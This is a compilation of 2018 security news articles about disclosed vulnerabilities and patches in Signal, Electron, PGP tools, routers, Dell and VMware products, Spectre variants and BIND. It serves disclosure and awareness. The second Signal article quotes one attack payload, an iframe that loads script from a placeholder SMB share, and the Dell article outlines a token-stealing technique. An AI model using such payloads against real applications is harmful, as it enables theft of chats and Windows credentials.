- Vulnerebility -

Last update 09.10.2017 13:51:50

Introduction  List  Kategorie  Subcategory 0  1  2  3  4  5  6  7  8 



Critical Flaws in PGP and S/MIME Tools Can Reveal Encrypted Emails in Plaintext
25.5.2018 thehackernews 
Vulnerebility
Note—the technical details of the vulnerabilities introduced in this article has now been released, so you should also read our latest article to learn how the eFail attack works and what users can do to prevent themselves.
An important warning for people using widely used email encryption tools—PGP and S/MIME—for sensitive communication.
A team of European security researchers has released a warning about a set of critical vulnerabilities discovered in PGP and S/Mime encryption tools that could reveal your encrypted emails in plaintext.
What's worse? The vulnerabilities also impact encrypted emails you sent in the past.
PGP, or Pretty Good Privacy, is an open source end-to-end encryption standard used to encrypt emails in a way that no one, not even the company, government, or cyber criminals, can spy on your communication.
S/MIME, Secure/Multipurpose Internet Mail Extensions, is an asymmetric cryptography-based technology that allows users to send digitally signed and encrypted emails.
Sebastian Schinzel, computer security professor at Münster University of Applied Sciences, headed on to Twitter to warn users of the issue, and said that "there are currently no reliable fixes for the vulnerability."
Electronic Frontier Foundation (EFF) has also confirmed the existence of “undisclosed” vulnerabilities and recommended users to uninstall PGP and S/MIME applications until the flaws are patched.
"EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages," the organisation said in its blog post.
"Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email."
So, until the vulnerabilities are patched, users are advised to stop sending and especially reading PGP-encrypted emails for now, and use alternative end-to-end secure tools, such as Signal.
EFF has warned users to immediately disable if they have installed any of the following mentioned plugins/tools for managing encrypted emails:
Thunderbird with Enigmail
Apple Mail with GPGTools
Outlook with Gpg4win
It should be noted that researchers have not claimed that the flaws reside in the way encryption algorithm works; instead, the issues appear in the way email decryption tools/plugins work.
The full technical details of the vulnerabilities will be released in a paper on Tuesday at 7 am UTC (3 am Eastern, midnight Pacific time).
Stay Tuned to The Hacker News for further details on the vulnerabilities.


Simple bug could lead to RCE flaw on apps built with Electron Framework
25.5.2018 thehackernews 
Vulnerebility
A critical remote code execution vulnerability has been discovered in the popular Electron web application framework that could allow attackers to execute malicious code on victims' computers.
Electron is an open source app development framework that powers thousands of widely-used desktop applications including WhatsApp, Skype, Signal, Wordpress, Slack, GitHub Desktop, Atom, Visual Studio Code, and Discord.
Besides its own modules, Electron framework also allows developers to create hybrid desktop applications by integrating Chromium and Node.js framework through APIs.
Since Node.js is a robust framework for server-side applications, having access to its APIs indirectly gives Electron-based apps more control over the operating system installed on the server.
To prevent unauthorised or unnecessary access to Node.js APIs, Electron framework by default sets the value of "webviewTag" to false in its "webPreferences" configuration file, which then sets "nodeIngration" to false.
This configuration file with the hardcoded values of some parameters was introduced in the framework to prevent real-time modifications by malicious functions, i.e., by exploiting a security vulnerability like cross-site scripting (XSS).
Moreover, if an app developer skips or forgets to declare "webviewTag: false" in the configuration file, even then the framework by default considers the value of "nodeIntegration" as false, to take a preventive measure.

However, Trustwave researcher Brendan Scarvell has released proof-of-concept (PoC) code that attackers can inject into targeted applications running without "webviewTag" declared, by exploiting a cross-site scripting flaw, to achieve remote code execution.
The exploit re-enables "nodeIntegration" in runtime, allowing attackers to gain unauthorised control over the application server and execute arbitrary system commands.
It should be noted that the exploit would not work if the developer has also opted for one of the following options:
nativeWindowOption option enabled in its webPreferences.
Intercepting new-window events and overriding event.newGuest without using the supplied options tag.
The vulnerability, tracked as CVE-2018-1000136, was reported to the Electron team by Scarvell earlier this year and affected all versions of Electron at the time of discovery.
Electron developers patched the vulnerability in March 2018 with the release of versions 1.7.13, 1.8.4, and 2.0.0-beta.4.
So, app developers should ensure their applications are patched, or at least not vulnerable to this issue.
For more technical details on the Electron vulnerability and PoC exploit code, you can head on to the Trustwave's blog post.
It should also be noted that the Electron bug has nothing to do with the recently discovered flaw in Signal app, which has also recently patched a critical cross-site scripting vulnerability that leads to remote code execution, whose full technical details are scheduled to be published exclusively on The Hacker News this evening. Stay Tuned!


Adobe Releases Critical Security Updates for Acrobat, Reader and Photoshop CC
25.5.2018 thehackernews 
Vulnerebility
Adobe has just released new versions of its Acrobat DC, Reader and Photoshop CC for Windows and macOS users that patch 48 vulnerabilities in its software.
A total of 47 vulnerabilities affect Adobe Acrobat and Reader applications, and one critical remote code execution flaw has been patched in Adobe Photoshop CC.
Out of 47, Adobe Acrobat and Reader affect with 24 critical vulnerabilities—categorized as Double Free, Heap Overflow, Use-after-free, Out-of-bounds write, Type Confusion, and Untrusted pointer dereference—which if exploited, could allow arbitrary code execution in the context of the targeted user.
Rest of the 23 flaws, including Security Bypass, Out-of-bounds read, Memory Corruption, NTLM SSO hash theft, and HTTP POST newline injection via XFA submission, are marked as important and can lead to information disclosure or security bypass.



adobe The above-listed vulnerabilities impact the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017.
The latest Adobe Acrobat and Reader patches have been given a priority rating of "1," which means the flaws are either being exploited in the wild or more likely to be exploited in the wild. So, users are highly recommended to update their software as soon as possible.
The flaws have been addressed in Acrobat DC and Acrobat Reader DC version 2018.011.20040, Acrobat 2017 and Acrobat Reader DC 2017 version 2017.011.30080, as well as Acrobat Reader DC (Classic 2015) and Acrobat DC (Classic 2015) version 2015.006.30418.
Security Patch for Adobe Photoshop CC
Adobe has also released security patches for the Windows and macOS versions of Photoshop CC to address a critical vulnerability, categorized as "out-of-bounds write" issue, which can be exploited to execute arbitrary code in the context of the current user.
The vulnerability (CVE-2018-4946) impacts Photoshop CC 2018 version 19.1.3 and earlier 19.x versions, as well as Photoshop CC 2017 version 18.1.3 and earlier 18.x versions.
The company credited researcher Giwan Go of Trend Micro's Zero Day Initiative for reporting the flaw, which has been addressed with the release of Photoshop CC 2018 version 19.1.4 and Photoshop CC 2017 version 18.1.4.
This update has been given a priority rating of "3," which means the attackers have not targeted the vulnerability.
Adobe recommends end users and administrators to install the latest security updates as soon as possible


Hackers Reveal How Code Injection Attack Works in Signal Messaging App
25.5.2018 thehackernews 
Vulnerebility
After the revelation of the eFail attack details, it's time to reveal how the recently reported code injection vulnerability in the popular end-to-end encrypted Signal messaging app works.
As we reported last weekend, Signal has patched its messaging app for Windows and Linux that suffered a code injection vulnerability discovered and reported by a team of white-hat hackers from Argentina.
The vulnerability could have been exploited by remote attackers to inject a malicious payload inside the Signal desktop app running on the recipients' system just by sending them a specially crafted link—without requiring any user interaction.
According to a blog post published today, the vulnerability was accidentally discovered while researchers–Iván Ariel Barrera Oro, Alfredo Ortega and Juliano Rizzo–were chatting on Signal messenger and one of them shared a link of a vulnerable site with an XSS payload in its URL.
However, the XSS payload unexpectedly got executed on the Signal desktop app.

XSS, also known as cross-site scripting, is a common attack vector that allows attackers to inject malicious code into a vulnerable web application.
After analyzing the scope of this issue by testing multiple XSS payloads, researchers found that the vulnerability resides in the function responsible for handling shared links, allowing attackers to inject user-defined HTML/JavaScript code via iFrame, image, video and audio tags.
Using this vulnerability, attackers can even inject a form on the recipient's chat window, tricking them to reveal their sensitive information using social engineering attacks.
It had previously been speculated that the Signal flaw might have allowed attackers to execute system commands or gain sensitive information like decryption keys—but no, it is not the case.
The vulnerability was immediately patched by the Signal developers shortly after the proof-of-concept video was released by Ortega last weekend.

The researchers also found that a patch (regex function to validate URLs) for this vulnerability existed in previous versions of the desktop app, but it was somehow removed or skipped in the Signal update released on 10th April this year.
Now, after knowing full details of the vulnerability, it seems that the issue is not a critical or dangerous one, as speculated.
So you can freely rely on Signal for encrypted communication without any worries. Just make sure the service is always up-to-date.


Red Hat Linux DHCP Client Found Vulnerable to Command Injection Attacks
25.5.2018 thehackernews 
Vulnerebility
A Google security researcher has discovered a critical remote command injection vulnerability in the DHCP client implementation of Red Hat Linux and its derivatives like Fedora operating system.
The vulnerability, tracked as CVE-2018-1111, could allow attackers to execute arbitrary commands with root privileges on targeted systems.
Whenever your system joins a network, it’s the DHCP client application which allows your system to automatically receive network configuration parameters, such as an IP address and DNS servers, from the DHCP (Dynamic Host Control Protocol) server.
The vulnerability resides in the NetworkManager integration script included in the DHCP client packages which is configured to obtain network configuration using the DHCP protocol.
Felix Wilhelm from the Google security team found that attackers with a malicious DHCP server, or connected to the same network as the victim, can exploit this flaw by spoofing DHCP responses, eventually allowing them to run arbitrary commands with root privileges on the victim's system running vulnerable DHCP client.
Although full details of the vulnerability have not been released, Wilhelm claims his PoC exploit code is so short in length that it even can fit in a tweet.
Meanwhile, Barkın Kılıç, a security researcher from Turkey, has released a tweetable proof-of-concept exploit code for the Red Hat Linux DHCP client vulnerability on Twitter.

In its security advisory, Red Hat has confirmed that the vulnerability impacts Red Hat Enterprise Linux 6 and 7, and that all of its customers running affection versions of the dhclient package should update their packages to the newer versions as soon as they are available.
"Users have the option to remove or disable the vulnerable script, but this will prevent certain configuration parameters provided by the DHCP server from being configured on a local system, such as addresses of the local NTP or NIS servers," Red Hat warns.
Fedora has also released new versions of DHCP packages containing fixes for Fedora 26, 27, and 28.
Other popular Linux distributions like OpenSUSE and Ubuntu do not appear to be impacted by the vulnerability, as their DHCP client implementation doesn't have NetworkManager integration script by default.


Another severe flaw in Signal desktop app lets hackers steal your chats in plaintext
25.5.2018 thehackernews 
Vulnerebility
For the second time in less than a week, users of the popular end-to-end encrypted Signal messaging app have to update their desktop applications once again to patch another severe code injection vulnerability.
Discovered Monday by the same team of security researchers, the newly discovered vulnerability poses the same threat as the previous one, allowing remote attackers to inject malicious code on the recipients' Signal desktop app just by sending them a message—without requiring any user interaction.
To understand more about the first code injection vulnerability (CVE-2018-10994), you can read our previous article covering how researchers find the Signal flaw and how it works.
The only difference between the two is that the previous flaw resides in the function that handles links shared in the chat, whereas the new vulnerability (CVE-2018-11101) exists in a different function that handles the validation of quoted messages, i.e., quoting a previous message in a reply.

In other words, to exploit the newly patched bug on vulnerable versions of Signal desktop app, all an attacker needs to do is send a malicious HTML/javascript code as a message to the victim, and then quote/reply to that same message with any random text.
If the victim receives this quoted message containing the malicious payload on its vulnerable Signal desktop app, it will automatically execute the payload, without requiring any user interaction.
Exploiting Signal Code Injection to Steal Plaintext Chats

Until now the proof-of-concept payloads used to demonstrate code injection vulnerabilities in Signal were limited to embedding an HTML iFrame, or image/video/audio tags onto the victim's desktop app.
However, researchers have now managed to craft a new PoC exploit that could allow remote attackers to successfully steal all Signal conversations of the victims in the plaintext just by sending them a message.
This hack literally defeats the purpose of an end-to-end encrypted messaging app, allowing remote attackers to easily get the hold on users' plain-text conversations without breaking the encryption.
Attackers Could Possibly Steal Windows Password As Well
What's worse?
In their blog post, the researchers also indicated that an attacker could even include files from a remote SMB share using an HTML iFrame, which can be abused to steal NTLMv2 hashed password for Windows users.
"In the Windows operative system, the CSP fails to prevent remote inclusion of resources via the SMB protocol. In this case, remote execution of JavaScript can be achieved by referencing the script in an SMB share as the source of an iframe tag, for example: <iframe src=\\DESKTOP-XXXXX\Temp\test.html> and then replying to it," the researchers explain.
Though they haven't claimed anything about this form of attack, I speculate that if an attacker can exploit code injection to force Windows OS to initiate an automatic authentication with the attacker-controlled SMB server using single sign-on, it would eventually hand over victim's username, and NTLMv2 hashed password to the attackers, potentially allowing them to gain access to the victim's system.
We have seen how the same attack technique was recently exploited using a vulnerability in Microsoft Outlook, disclosed last month.
I can not verify this claim at this moment, but we are in contact with few security researchers to confirm this.
Researchers—Iván Ariel Barrera Oro, Alfredo Ortega, Juliano Rizzo, and Matt Bryant—responsibly reported the vulnerability to Signal, and its developers have patched the vulnerability with the release of Signal desktop version 1.11.0 for Windows, macOS, and Linux users.
However, The Hacker News has learned that Signal developers had already identified this issue as part of a comprehensive fix to the first vulnerability before the researchers found it and reported them.
Signal app has an auto-update mechanism, so most users must have the update already installed. You can read this guide to ensure if you are running updated version of Signal.
And if you don’t, you should immediately update your Signal for desktop as soon as possible, since now the vulnerability poses a severe risk of getting your secret conversations exposed in plaintext to attackers and further severe consequences.


Vulnerabilities Found in RTUs Used by European Energy Firms
24.5.2018 securityweek 
Vulnerebility

Several critical and high severity vulnerabilities have been found in remote terminal unit (RTU) modules designed for the energy sector and used in various European countries.

Bernhards Blumbergs and Arturs Danilevics of Latvia’s CERT.LV discovered that Telem-GW6 and Telem-GWM products made by Estonia-based Martem are affected by vulnerabilities that can be exploited to cause a denial-of-service (DoS) condition and execute arbitrary code and commands.

Martem, which specializes in telecontrol systems for supervising and controlling electrical distribution networks, says its clients are electrical distribution firms, and industrial and transportation companies that have their own electrical networks. Martem’s main customers are located in Estonia, Lithuania, Latvia and Finland.Vulnerabilities found in Martem RTUs

The company said its RTUs were used earlier this year in a cyber defense exercise organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE).

The vulnerable products are data concentrators that collect data from peripheral devices in the substation. The RTUs impacted by the security holes found by Blumbergs and Danilevics are GW6 version 2018.04.18-linux_4-01-601cb47 and prior, and GWM version 2018.04.18-linux_4-01-601cb47 and prior.

The most serious of the flaws, with a CVSS score of 10, is CVE-2018-10603, which allows a rogue node on the network to send unauthorized commands and take control of the industrial process. The vulnerability is caused by the lack of authentication for commands using IEC-104, a protocol standard for telecontrol, teleprotection and telecommunications for electric power systems.

Another security hole, rated “high severity” and tracked as CVE-2018-10607, has been classified as an uncontrolled resource consumption issue. According to ICS-CERT, a DoS condition can be caused within the industrial process control channel by creating new connections to one or more input/output accessories (IOAs) and not closing them properly.

Vulnerabilities found in Martem RTUs

The last vulnerability, tracked as CVE-2018-10609 and also classified as “high severity,” is a cross-site scripting (XSS) bug that can be exploited to execute arbitrary code on the client side with the privileges of the targeted user.

According to ICS-CERT, the vulnerabilities can be exploited remotely even by an attacker with a low skill level.

The vendor says the XSS flaw will be patched with the release of firmware version 2.0.73, which is expected to become available sometime after May 23. Attacks can also be prevented by disabling the web server if it’s not needed, or protecting the web server with a strong password to avoid unauthorized access.

The other two vulnerabilities can be mitigated through configuration changes, including using VPNs, using a firewall for packet filtering, and configuring the RTU so that only trusted systems can send commands.


Kaspersky discovered a backdoor account and other issues in D-Link DIR-620 Routers
24.5.2018 securityaffairs
Vulnerebility

Security experts from Kaspersky have discovered a backdoor account and other three vulnerabilities in D-Link DIR-620 Routers.
Security researchers from Kaspersky Lab have uncovered a backdoor account (CVE-2018-6213) in the firmware of D-Link DIR-620 routers that could be exploited by attackers to access to the device’s web panel and take over devices exposed online.

“The latest versions of the firmware have hardcoded default credentials that can be exploited by an unauthenticated attacker to gain privileged access to the firmware and to extract sensitive data, e.g., configuration files with plain-text passwords.” reads the blog post published by Kaspersky.

“The vulnerable web interface allows an unauthenticated attacker to run arbitrary JavaScript code in the user environment and run arbitrary commands in the router’s operating system (OS).”

To prevent abuse, the experts did not disclose the credentials for the backdoor account.

D-Link DIR-620 rev-F1

The bad news is that it is impossible to disable the backdoor account, the only way to mitigate the issue is to avoid exposing the admin panel online.

The firmware version containing the backdoor account is 1.0.37.

Kaspersky researchers have discovered other three vulnerabilities in the firmware of the D-Link DIR-620 routers. The remaining issues are:

CVE-2018-6210 – Hardcoded default credentials for Telnet.
CVE-2018-6211 – OS command injection
CVE-2018-6212 – Weakness in user data validation (reflected cross-site scripting)
Fortunately, there aren’t many D-Link DIR-620 devices exposed online because it is an old model.

The flawed devices were distributed by ISPs in Russia, CIS, and Eastern Europe ISPs (most of them in Russia), Kaspersky already reported the flaws to the ISPs.

D-Link DIR-620 shodan

D-Link was notified the vulnerabilities by said it will not issue firmware updates to address them.

To mitigate the issues Kaspersky recommends:

Restrict any access to the web dashboard using a whitelist of trusted IPs
Restrict any access to Telnet
Regularly change your router admin username and password


VMware Patches Fusion, Workstation Vulnerabilities
23.5.2018 securityweek
Vulnerebility

VMware informed customers on Monday that updates for its Fusion and Workstation products patch important denial-of-service (DoS) and privilege escalation vulnerabilities.

According to VMware, Fusion 10.x on macOS is impacted by a signature bypass flaw that can be exploited for local privilege escalation. The security hole, tracked as CVE-2018-6962, was discovered by a researcher from Chinese company Ant Financial. The issue has been fixed with the release of VMware Fusion 10.1.2.

VMware also revealed that Workstation 14.x on any platform and Fusion 10.X on macOS are impacted by several DoS vulnerabilities. 
“VMware Workstation and Fusion contain multiple denial-of-service vulnerabilities that occur due to NULL pointer dereference issues in the RPC handler. Successful exploitation of these issues may allow an attacker with limited privileges on the guest machine trigger a denial-of-Service of their guest machine,” the company said in its advisory.

The flaw, identified as CVE-2018-6963, was reported to VMware by Hahna Latonick and Kevin Fujimoto through Trend Micro's Zero Day Initiative (ZDI), and independently by Bruno Botelho. The issue was addressed with the release of Workstation 14.1.2 and Fusion 10.1.2.

ZDI has yet to publish its advisories for the vulnerabilities found by Latonick and Fujimoto, but the company’s site shows that the issues were reported in mid-April.

VMware on Monday also published an advisory describing the impact of a recently uncovered speculative execution attack method on its products.

Researchers disclosed the details of two new issues, related to the Meltdown and Spectre attacks, that have been dubbed Variant 3a and Variant 4.

VMware says Variant 4, tracked as CVE-2018-3639, affects vSphere, Workstation and Fusion. Updates for these products enable Hypervisor-Assisted Guest mitigations for this vulnerability.

“vCenter Server, ESXi, Workstation, and Fusion update speculative execution control mechanism for Virtual Machines (VMs). As a result, a patched Guest Operating System (GOS) can remediate the Speculative Store bypass issue (CVE-2018-3639) using the Speculative-Store-Bypass-Disable (SSBD) control bit. This issue may allow for information disclosure in applications and/or execution runtimes which rely on managed code security mechanisms. Based on current evaluations, we do not believe that CVE-2018-3639 could allow for VM to VM or Hypervisor to VM Information disclosure,” VMware said.

Earlier this month, the company published an advisory informing customers that VMware NSX SD-WAN Edge by VeloCloud contains an unauthenticated command injection vulnerability. While the issue is potentially serious as it allows remote code execution, it has been assigned a severity rating of “important” as the impacted component is not enabled by default and it will be removed in future releases.


Critical Flaw Impacts Dell EMC RecoverPoint
23.5.2018 securityweek
Vulnerebility

Several security flaws were recently found in Dell EMC RecoverPoint, including a Critical remote code execution vulnerability, security firm Foregenix reveals.

Researchers from Foregenix found a total of six security issues impacting all versions of Dell EMC RecoverPoint prior to 5.1.2, as well as RecoverPoint for Virtual Machines prior to 5.1.1.3.

The flaws were reported to Dell in February, but the company released an update only last week, which only addressed some of the bugs. The available fixes are available through Dell EMC support.

Of the six vulnerabilities, only three received CVE numbers to date. These include CVE-2018-1235 (CVSS 9.8, Critical severity), CVE-2018-1242 (CVSS 6.7, Medium severity), and CVE-2018-1241 (CVSS 6.2, Medium severity).

The most important of the issues allows an unauthenticated remote attacker to execute arbitrary code with root privileges via an unspecified attack vector.

“The critical vulnerability allows unauthenticated remote code execution with root privileges. This means, that if an attacker with no knowledge of any credentials has visibility of RecoverPoint on the network, or local access to it, they can gain complete control over the RecoverPoint and its underlying Linux operating system,” Foregenix reveals.

The security researchers note that, once they gained complete control over the impacted device, they could exploit other unpatched vulnerabilities “to pivot and gain control of the Microsoft Active Directory network that the RecoverPoints were integrated with.”

The second newly discovered flaw is an administrative menu arbitrary file read, which could allow an attacker with access to the boxmgmt administrative menu to read files from the file system (which are accessible to the boxmgmt user).

In certain conditions, RecoverPoint leaks plaintext Lightweight Directory Access Protocol credentials into the Tomcat log file, the security firm says.

“When the LDAP server is not contactable by RecoverPoint, and a log in attempt is made to an LDAP linked account via a RecoverPoint web interface, LDAP credentials are leaked into the tomcat.log file. These credentials may remain in the log file indefinitely, providing opportunity for attackers with access to the RecoverPoint file system to obtain them and resulting in LDAP account compromise,” Foregenix notes.

The researchers also discovered that RecoverPoint is shipped with "root" password hashes for grub stored in /distribution.log, a file readable by any user. CVE was initially issued for the flaw, but Dell apparently revoked it, claiming that the file would be only readable by root, but the researchers claim they could read the file as the www-data user.

Although the CVE was revoked, Dell did fix the flaw for new installations of RecoverPoint. “At the time of writing it was not clear whether the vendor would reinstate the CVE, or whether performing an upgrade would remove the hash from previous versions of the world-readable log file,” Foregenix says.

RecoverPoint was also found to use a hardcoded root password that the user cannot change unless they contact the vendor. An attacker knowing the password could “gain control over all of the devices by logging in at the local console, or gaining console access as an unprivileged user, and changing to root.”

A CVE was not issued for the vulnerability, but the vendor apparently said that a documentation update will make it clear that a dedicated script from the support team is necessary to change the password.

The sixth vulnerability resides in an insecure configuration option that results in LDAP credentials being sent by the RecoverPoint in clear text, thus potentially exposing them to eavesdroppers.

“When the LDAP simple bind configuration is used, credentials are sent from the RecoverPoint server in cleartext. This means that a man-in-the-middle attacker or an attacker who has gained access to the RecoverPoint using another vulnerability, can monitor the traffic and discover LDAP credentials which have been entrusted to the RecoverPoint,” Foregenix says.

The RecoverPoint documentation includes a warning about the insecure configuration, but the RecoverPoint menu itself does not include such an alert.


Tech Firms Coordinate Disclosure of New Meltdown, Spectre Flaws
22.5.2018 securityweek 
Vulnerebility

Intel, AMD, ARM, IBM, Microsoft and other major tech companies on Monday released updates, mitigations and advisories for two new variants of the speculative execution attack methods known as Meltdown and Spectre.

In January, researchers from several organizations warned that processors from Intel, AMD, ARM and other companies are affected by vulnerabilities that allow malicious applications to bypass memory isolation mechanisms and gain access to sensitive data.

Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2), while Meltdown attacks are possible due to CVE-2017-5754 (Variant 3). Researchers at Google Project Zero and Microsoft recently identified a new method which they have dubbed Variant 4.

Variant 4 relies on a side-channel vulnerability known as Speculative Store Bypass (SSB) and it has been assigned the identifier CVE-2018-3639. Companies have also shared details on Variant 3a, a Rogue System Register Read issue tracked as CVE-2018-3640. Variant 3a was documented by ARM back in January, but it went largely unnoticed.New Meltdown and Spectre variants discovered

A German magazine reported in early May that Intel and others had been working on patches for several new Spectre flaws dubbed “Spectre-NG.” Reports claimed the new variants may be more serious and easier to exploit, but none of the impacted vendors appear too concerned about the new findings, in most cases assigning medium/moderate/important severity ratings.

Microsoft is still analyzing its products, but so far it has not identified any code in its software or cloud service infrastructure that allows exploitation of Variant 4. The company says its previous Meltdown and Spectre mitigations should address this variant as well, and noted that “Microsoft Edge, Internet Explorer, and other major browsers have taken steps to increase the difficulty of successfully creating a side channel.”

As for Variant 3a, Microsoft says “the mitigation for this vulnerability is exclusively through a microcode/firmware update, and there is no additional Microsoft Windows operating system update.”

Intel has already developed microcode patches that should address both Variant 3a and Variant 4. Beta versions have been provided to OEMs and operating system vendors, and BIOS and software updates are expected to become available in the next weeks.

“[The mitigation for Variant 4] will be set to off-by-default, providing customers the choice of whether to enable it. We expect most industry software partners will likewise use the default-off option,” said Leslie Culbertson, executive vice president and general manager of Product Assurance and Security at Intel.

If the mitigation is enabled, there may be a negative impact on performance of roughly 2-8 percent, the chipmaker says.

AMD claims it has not identified any products vulnerable to Variant 3a and any patches for Variant 4 should be expected from Microsoft and Linux distributions.

IBM has released both operating system and firmware updates to patch Variant 4 in its Power Systems clients.

The list of other organizations that published advisories and blog posts for Variant 3a and Variant 4 include Red Hat, VMware, Oracle, Cisco, Xen, Ubuntu, Suse, CERT/CC and US-CERT.

Several other side-channel attack methods have been identified since the initial disclosure of Spectre and Meltdown, including ones dubbed BranchScope, SgxPectre, and MeltdownPrime and SpectrePrime. The most recently discovered method has allowed researchers to gain access to the highly privileged System Management Mode (SMM) memory.


TheMoon botnet is now leveraging a zero-day to target GPON routers

22.5.2018 securityaffairs Vulnerebility

Security experts from Qihoo 360 Netlab discovered the operators behind the TheMoon botnet are now leveraging a zero-day exploit to target GPON routers.
Researchers from security firm Qihoo 360 Netlab reported that cybercriminals are continuing to target the Dasan GPON routers, they recently spotted threat actors using another new zero-day flaw affecting the same routers and recruit them in their botnet.

At the time of writing, there aren’t further details on the vulnerabilities exploited by attackers in the wild, Qihoo 360 Netlab experts only confirmed that the exploit code they tested worked on two models of GPON routers.

The security firm has refused to release further details on this flaw to prevent more attacks but said it was able to reproduce its effects.

Experts discovered the operators behind the TheMoon botnet are now leveraging the zero-day exploit to target GPON routers. The activity of the TheMoon botnet was first spotted in 2014, and since 2017 its operators added to the code of the bot at least 6 IoT device exploits.

“A very special thing about this round is the attacking payload. It is different from all previous ones, so it looks like a 0day.” reads the analysis published by Netlab.

“And we tested this payload on two different versions of GPON home router, all work. All these make TheMoon totally different, and we chose NOT to disclose the attack payload details.”

GPON routers

TheMoon isn’t only the last botnet targeting Dasan GPON routers, in a previous analysis shared by Netlab, the experts confirmed that Hajime, Mettle, Mirai, Muhstik, and Satori botnets have been exploiting the CVE-2018-10561 and CVE-2018-10562 exploits for the same models.

Netlab along with other security firms have managed to take down the C&C servers of the Muhstik botnet.

Despite a large number of GPON routers is exposed online only 240,000 have been compromised, likely because the exploit code used by the attackers was not able to properly infect the devices.

Experts warn that the number of infected GPON routers could rapidly increase if the zero-day vulnerability will be exploited by other threat actors.


Dell Patches Vulnerability in Pre-installed SupportAssist Utility
21.5.2018 securityweek 
Vulnerebility

Dell Patches Local Privilege Escalation in SupportAssist

Dell recently addressed a local privilege escalation (LPE) vulnerability in SupportAssist, a tool pre-installed on most of all new Dell devices running Windows.

The security issue resides in a kernel driver the tool loads, Bryan Alexander, the security researcher who discovered the issue, reveals. The Dell SupportAssist tool is mainly used to troubleshoot issues and offer support to both the user and Dell.

The vulnerability can be abused to bypass driver signature enforcement (DSE) ad infinitum, the researcher says. The driver, he explains, exposes a lot of functionality, providing “capabilities for reading and writing the model-specific register (MSR), resetting the 1394 bus, and reading/writing CMOS.”

The impacted driver is first loaded when SupportAssist is launched (filename pcdsrvc_x64.pkms or pcdsrvc.pkms, depending on architecture). Although used by Dell, the driver is built by PC-Doctor, a company that offers “system health solutions” to computer makers such as Dell, Intel, Yokogawa, IBM, and others.

“Once the driver is loaded, it exposes a symlink to the device at PCDSRVC{3B54B31B-D06B6431-06020200}_0 which is writable by unprivileged users on the system. This allows us to trigger one of the many IOCTLs exposed by the driver; approximately 30,” the researcher explains.

Alexander also found a DLL used by the userland agent that also worked as an interface to the kernel driver and had symbol names available. Further analysis revealed a MemDriver class that allow userland services to read and write arbitrary physical addresses.

For that, however, the driver must be ‘unlocked’ to start processing control codes. To unlock it, one would simply need to send a system call (ioctl) containing the proper code. Next, the driver sets a global flag and “will process control codes for the lifetime of the system,” the researcher notes.

To exploit the issue, one can start reading physical memory looking for process pool tags, then identify a target process and a SYSTEM process, and then steal the token.

“However, PCD appears to give us a shortcut via getPhysicalAddress ioctl. If this does indeed return the physical address of a given virtual address (VA), we can simply find the physical of our VA and enable a couple token privileges using the writePhysicalMemory ioctl,” the researcher notes.

The issue, nevertheless, is that only usermode addresses can be resolved this way, as the MmProbeAndLockPages call is passing in UserMode for the KPROCESSOR_MODE.

Even so, one could still read chunks of physical memory, and the researcher used that to toggle on SeDebugPrivilege for the current process token (which requires “finding the token in memory and writing a few bytes at a field offset”).

Once the physical address of the token has been identified, the researcher triggered two separate writes at the Enabled and Default fields of a _TOKEN. The researcher published the source code of the bug on GitHub.

The vulnerability was reported to Dell in early April, but a patched version of SupportAssist was only released last week.


Researcher Earns $36,000 for Google App Engine Flaws
21.5.2018 securityweek 
Vulnerebility

An 18-year-old researcher has earned more than $36,000 from Google after finding a critical remote code execution vulnerability related to the Google App Engine.

Part of the Google Cloud offering, the App Engine is a framework that allows users to develop and host web applications on a fully managed serverless platform.

In February, Ezequiel Pereira, a student from Uruguay, managed to gain access to a non-production Google App Engine development environment. Once he obtained access, he discovered that he could use some of Google’s internal APIs.

Pereira did not notice anything that appeared dangerous before his first report through Google’s Vulnerability Reward Program (VRP), but his findings were assigned a P1 priority rating, which indicates that the issue needs to be addressed quickly as it may impact a large percentage of users.

After looking around more, the researcher did come across some interesting methods and submitted a second report to Google. Following the second report, the tech giant escalated the issue and advised Pereira to stop his tests as he might “easily break something using these internal APIs.”

Google’s own analysis of the security holes led to the determination that they could have been exploited for remote code execution “due to the way Google works.”

Google awarded the researcher a total of $36,337 for his findings, including $5,000 for a less severe issue. The first report was sent to the company on February 25 and a patch was rolled out sometime between March 6 and March 13, Pereira said.

The expert has published a blog post detailing his findings and his interactions with Google.

This was not the first time Pereira discovered serious vulnerabilities in Google services. In the past few years, he earned thousands of dollars through the VRP.

Bug bounty hunters often push their tests to the limit due to concerns that the vendor might downplay their findings if they don’t clearly demonstrate the impact of a vulnerability. However, at least in Pereira’s case, Google does appear to have calculated bug bounty payouts based on full potential impact. In the past, the expert earned up to $10,000 for weaknesses that initially did not appear to be worth much in terms of a bug bounty.


Internet Systems Consortium rolled out security updates to address 2 flaws in BIND DNS Software
21.5.2018 securityaffairs 
Vulnerebility

On Friday, the Internet Systems Consortium (ISC) announced security updates for BIND DNS software that address two vulnerabilities rated with a “medium” severity rating.
Both vulnerabilities could be exploited by attackers to cause a denial-of-service (DoS) condition, the first issue tracked as CVE-2018-5737 can also cause severe operational problems such as degradation of the service.

“A problem with the implementation of the new serve-stale feature in BIND 9.12 can lead to an assertion failure in rbtdb.c, even when stale-answer-enable is off. Additionally, problematic interaction between the serve-stale feature and NSEC aggressive negative caching can in some cases cause undesirable behavior from named, such as a recursion loop or excessive logging.” reads the security advisory published by the ISC.

“Deliberate exploitation of this condition could cause operational problems depending on the particular manifestation — either degradation or denial of service.”

The flaw affects BIND 9.12.0 and 9.12.1 which permit recursion to clients and which have the max-stale-ttl parameter set to a non-zero value are at risk.

The Internet Systems Consortium (ISC) has addressed the flaw with the release of BIND 9.12.1-P2. Below the workaround provided by the organization:

Setting “max-stale–ttl 0;” in named.conf will prevent exploitation of this vulnerability (but will effectively disable the serve-stale feature.)
Setting “stale-answer enable off;” is not sufficient to prevent exploitation, max-stale-ttl needs to be set to zero.
BIND DNS sw flaw

The second flaw tracked as CVE-2018-5736 is remotely exploitable if the attacker can trigger a zone transfer.

“An error in zone database reference counting can lead to an assertion failure if a server which is running an affected version of BIND attempts several transfers of a slave zone in quick succession,” states the advisory published by the ISC.

